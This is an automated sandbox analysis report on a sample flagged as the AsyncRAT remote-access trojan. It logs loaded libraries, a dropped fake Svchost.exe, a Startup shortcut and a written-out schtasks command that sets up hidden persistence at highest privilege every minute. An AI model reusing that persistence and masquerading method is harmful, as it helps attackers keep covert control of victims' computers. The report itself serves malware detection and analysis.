                  Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\Svchost.exe 3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                  Source: C:\Windows\System32\svchost.exe, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: X.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: X.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: X.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: X.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Svchost.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: X.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: X.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Svchost.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Svchost.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@18/10@5/2
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7096
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                  Source: C:\Users\user\Desktop\X.exeMutant created: \Sessions\1\BaseNamedObjects\o8IEVsVtNAApv1Ch
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                  Source: X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: X.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\X.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: X.exeReversingLabs: Detection: 81%
                  Source: X.exeVirustotal: Detection: 79%
                  Source: C:\Users\user\Desktop\X.exeFile read: C:\Users\user\Desktop\X.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\X.exe C:\Users\user\Desktop\X.exe
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe "C:\Users\user\AppData\Local\Temp\Svchost.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972Jump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\Desktop\X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                  Source: Svchost.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\Svchost.exe
                  Source: C:\Users\user\Desktop\X.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbc9 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: .pdb6 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdbp source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbp source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Configuration.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: csymbols\dll\mscorlib.pdbpdb` source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.pdb( source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Core.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.pdbSystem.Management.dllSystem.Xml.ni.dll source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.pdb@ source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp, WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B10D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbp source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb,_ source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: p\X.PDB0 source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\X.PDBL7 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER93E1.tmp.dmp.17.dr

                  Data Obfuscation

                  Source: X.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
